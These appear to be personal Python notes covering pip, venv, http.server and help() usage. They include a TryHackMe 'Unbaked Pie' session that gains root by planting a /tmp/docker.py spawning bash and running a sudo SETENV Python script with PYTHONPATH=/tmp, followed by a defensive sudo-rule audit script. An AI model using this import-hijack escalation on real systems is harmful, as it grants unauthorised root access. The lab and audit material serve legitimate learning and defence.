Python: Notes

>>> Python Standard Library

python -m venv name_env : Create virtual environment 'name_env'
python -m pip install --upgrade pip : Upgrade pip (a package manager for Python)

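python -m http.server 8080 -d /var/www/test : Run an ad hoc web server serving /var/www/test, reachable at localhost:8080 (it listens on all interfaces by default; add --bind 127.0.0.1 to restrict it to localhost)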

pip is a package manager for Python and has been installed by default since Python 3.4.

pip install package_name : Install package_name
pip uninstall package_name : Uninstall package_name
pip install -r requirements.txt : Install packages listed in the requirements.txt file
pip list : List all installed packages

78 / 10 # 7.8 : division
78 // 10 # 7 : integer division
78 % 10 : modulo

Generate GUID

PS C:\Users\Tuyen> python -c "import uuid ; print(uuid.uuid4())"
01fcc0fc-a620-4f13-9174-c26e3e292780
PS C:\Users\Tuyen>

Get Help

PS C:\Users\Tuyen> python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> help
Type help() for interactive help, or help(object) for help about object.
>>> help()

Welcome to Python 3.6's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/3.6/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help>

Install the python-jwt module for Python 2 on Kali Linux WSL

pip install -t /usr/local/lib/python2.7/dist-packages/ python-jwt

Exploit python

oliver@unbaked:~$ sudo -l
Matching Defaults entries for oliver on unbaked:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User oliver may run the following commands on unbaked:
    (root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py
oliver@unbaked:~$ cat /opt/dockerScript.py
import docker

# oliver, make sure to restart docker if it crashes or anything happened.
# i havent setup swap memory for it
# it is still in development, please dont let it live yet!!!
client = docker.from_env()
client.containers.run("python-django:latest", "sleep infinity", detach=True)
oliver@unbaked:~$ touch /tmp/docker.py
oliver@unbaked:~$ nano /tmp/docker.py
oliver@unbaked:~$ chmod +x /tmp/docker.py
oliver@unbaked:~$ cat /tmp/docker.py
import os
os.system("/bin/bash")
oliver@unbaked:~$
oliver@unbaked:~$ sudo PYTHONPATH=/tmp /usr/bin/python /opt/dockerScript.py
oliver@unbaked:~# id
uid=0(root) gid=0(root) groups=0(root)
oliver@unbaked:~# cat /root/root.txt
CONGRATS ON PWNING THIS BOX!
Created by ch4rm & H0j3n
ps: dont be mad us, we hope you learn something new

flag: THM{REDACTED}
oliver@unbaked:~#
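
An added example, not part of the original notes: a small audit of `sudo -l` output that flags the pattern in the session above, a SETENV-tagged rule running a Python interpreter without -E or -I, which leaves PYTHONPATH (and so the resolution of `import docker`) to the caller. Only the first sample rule comes from this page; the other rules and all function names are constructed for illustration.

```python
import re
import shlex

# Constructed `sudo -l` output; only the first rule is the one shown on this page.
SAMPLE_SUDO_L = """\
User oliver may run the following commands on unbaked:
    (root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py
    (root) NOPASSWD: /usr/bin/python /opt/backup.py
    (root) SETENV: NOPASSWD: /usr/bin/python3 -I /opt/report.py
    (root) SETENV: NOPASSWD: /usr/bin/systemctl restart docker
"""

ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/.*)$")
PYTHON = re.compile(r"(?:^|/)python[\d.]*$")
NOARG_FLAGS = set("bBdEhiIOPqRsSuvVx")  # interpreter switches that take no argument


def ignores_python_env(argv):
    """True if -E or -I appears among the switches placed before the script path."""
    for arg in argv[1:]:
        letters = arg[1:]
        if not arg.startswith("-") or not letters or not set(letters) <= NOARG_FLAGS:
            return False  # script path or a switch with an argument: assume unprotected
        if "E" in letters or "I" in letters:
            return True  # PYTHONPATH and the other PYTHON* variables are ignored
    return False


def audit(sudo_l_text):
    """Return (command, reason) for rules where the caller can steer Python imports."""
    findings = []
    for line in sudo_l_text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        tags = set(re.findall(r"[A-Z_]+", m.group("tags")))
        argv = shlex.split(m.group("cmd"))
        if "SETENV" in tags and PYTHON.search(argv[0]) and not ignores_python_env(argv):
            findings.append((m.group("cmd"), "SETENV allows caller-set PYTHONPATH; no -E/-I"))
    return findings


if __name__ == "__main__":
    for cmd, reason in audit(SAMPLE_SUDO_L):
        print(f"[!] {cmd}: {reason}")
```

Removing SETENV from the rule is the fix that takes the environment out of the caller's hands, since env_reset then drops PYTHONPATH; -E and -I only cover Python's own PYTHON* variables.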

Practice

>>> THM | Unbaked Pie

>>> The Zen of Python by Tim Peters
